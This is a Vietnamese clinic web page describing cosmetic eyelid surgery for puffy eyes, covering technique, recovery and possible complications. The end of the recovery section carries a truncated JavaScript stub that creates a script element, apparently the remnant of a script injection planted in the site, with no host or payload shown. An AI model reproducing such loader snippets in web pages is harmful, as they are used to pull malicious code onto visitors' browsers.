Home » Tư vấn » Phẫu thuật thẩm mỹ mắt bụp

Phẫu thuật thẩm mỹ mắt bụp

Da vùng quanh mắt, mất tính đàn hồi là dấu hiệu của sự lão hóa ở nam giới và phụ nữ, thêm vào đó cơ vòng mắt bị sa dãn, làm cho da mí mắt trên rộng chùng và rủ xuống, cùng với các túi mỡ ở mí dưới làm cho khuôn mặt trông mệt mỏi, uể oải, già nua. Những người có yếu tố di truyền, tiếp xúc với ánh nắng quá mức hoặc hút thuốc nhiều có thể làm cho tình trạng này càng tồi tệ hơn.

Phẫu thuật cắt bỏ da thừa mí mắt hay thẩm mỹ mắt bụp, khôi phục lại sự trẻ trung cho khuôn mặt bằng cách cho mí mắt hài hòa và tương xứng hơn. Cắt mí mắt trên có thể hữu ích nếu bạn có da mí mắt trên thừa làm cản trở tầm nhìn, hoặc bị mất nếp gấp mí mắt trên do túi mỡ. Mí mắt dưới quầng thâm hoặc thừa mở làm bụp mi dưới, phẫu thuật cắt bỏ da thừa, lấy mở mi mắt dưới sẽ tạo một diện mạo mới trẻ trung và linh hoạt hơn.

phau-thuat-mat-bup
Phẫu thuật mắt bụp đẹp tự nhiên

Kỹ thuật:

Phẫu thuật thẩm mỹ mắt bụp thường được gây tê tại chổ, vết mổ nằm trong các nếp gấp tự nhiên của mí mắt trên và dưới bờ cung mi mắt dưới. Một số trường hợp mắt bị hỏm sâu, mở được sắp xếp lại hoặc ghép thêm mở vào khoảng khuyết thiếu mở trong trường hợp và thời gian thực hiện khoảng một giờ để hoàn thành, sau đó về nhà và nghỉ ngơi. Nếu chỉ lấy mở mi dưới , phẫu thuật có thể thực hiện với vết mổ bên trong mắt, không có vết mổ hoặc sẹo ở bên ngoài mi mắt dưới.

Sau mổ đau nhẹ, được kiểm soát bằng thuốc uống.

Bầm tím, sưng và nhạy cảm với ánh sáng kéo dài khoảng một tuần hoặc 2 tuần, sưng bầm ít hay nhiều còn tùy thuộc vào cơ địa của từng người và khả năng chuyên môn, tay nghề của bác sĩ phẫu thuật thẩm mỹ.

Cắt chỉ sau 4 đến 6 ngày.

Có thể đeo kính áp tròng và trang điểm mắt ngay sau khi cắt chỉ.

Chia sẻ kinh nghiệm nhấn mí mắt cho kết quả như mong muốn
Áp dụng công nghệ thẩm mỹ mắt hiệu quả nhất

Biến chứng có thể gặp:

Cảm giác khó chịu “căng” trong mí mắt tạm thời, sưng hoặc bầm tím. Có thể gặp chảy nước mắt và nhạy cảm với ánh sáng trong vài tuần đầu. Khô mắt tạm thời, rát hay ngứa mắt cũng có thể xảy ra nhưng hiếm gặp.
Phục hồi :

Bệnh nhân có thể bắt đầu đọc sách sau khoảng 2-3 ngày và có thể trở lại làm việc sau khoảng 5-10 ngày. Sử dụng kính áp tròng sau hai tuần. Bệnh nhân không nên uống rượu sau khi phẫu thuật. Hoạt động nhiều vất vả hơn và tiêu thụ rượu sau ba tuần.var d=document;var s=d.createElement(‘script’);

About đại lê

Hỏi đáp

Email của Quý khách sẽ không được công bố *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Copy Protected by Chetan's WP-Copyprotect.